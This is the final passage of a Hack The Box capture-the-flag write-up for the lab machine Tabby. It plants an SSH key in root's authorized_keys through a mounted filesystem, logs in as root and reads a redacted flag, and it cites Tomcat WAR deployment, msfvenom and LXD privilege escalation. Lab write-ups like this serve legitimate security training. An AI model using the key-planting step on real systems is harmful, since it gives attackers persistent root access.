~ # cd /mnt/root/root/.ssh/ /mnt/root/root/.ssh # echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzD5s0m0O3c3au6Xs9P+HS7AxrYShHdJgdW64KoR09KbPdxfQLjwSkg7xv/m2c++FrEvL036xVY7MS/2kk+EtCrRH+BapfqQZUeLz7KsiXGmvI6cRs4dkMjPPGFsqXsiEQ7vCAA+1pXV/WgQO62FANn2bqUQq9NBa85FdGOSLdb k7siCi7KzcCnHl4sWDtmP9707S0NKyAAGcGEyukOAcGmbocl+9wxkVMxfY/50IHnQKTNrbmg0biWJEd8IPiLoRVHlI8ZRh76ggbOjuh9rnQOG7aIMq7LxEEjfTZmXuXgwObqYtWRzRh6u0OIBedKwEHXJvxNtZaUqb9csdK/vyGrylwF+oUmoL/2VHlUofDip7JK/Nzqk9J1LEzAU22hywRJ95fA36q9KNEDm6xtsrCJc zMZb/bZkcEnkqLR5UgsJPKusSGf/3fZIeIGhWNsWxuUJfB9NBWkWpqaCbjkVP+9zcfLB1MOA8EFKS5JlUJiJ0Za/7KqC/LMBbAIpDdBW8= u505@naos' >> authorized_keys
Root flag
u505@naos:~/HTB/Machines/Tabby$ ssh -i u505 root@tabby Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-31-generic x86_64)
* Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage
System information as of Fri 08 Jan 2021 10:17:56 AM UTC
System load: 0.0 Usage of /: 34.4% of 15.68GB Memory usage: 29% Swap usage: 0% Processes: 190 Users logged in: 1 IPv4 address for ens192: 10.10.10.194 IPv4 address for lxdbr0: 10.200.98.1 IPv6 address for lxdbr0: fd42:637d:ff1d:836d::1
* MicroK8s gets a native Windows installer and command-line integration.
https://ubuntu.com/blog/microk8s-installers-windows-and-macos
0 updates can be installed immediately. 0 of these updates are security updates.
The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Jun 17 21:58:30 2020 from 10.10.14.2
root@tabby:~# cat root.txt <ROOT_FLAG>
References
- Apache Tomcat auto WAR deployment & pwning penetration testing tool
- https://tomcat.apache.org/tomcat-9.0-doc/manager-howto.html#Deploy_A_New_Application_Archive_(WAR)_Remotely
- MSFVenom Cheatsheet
- https://stackoverflow.com/questions/5143915/test-file-upload-using-http-put-method
- https://www.hackingarticles.in/lxd-privilege-escalation/
Daniel Simao 05:13, 8 January 2021 (EST)
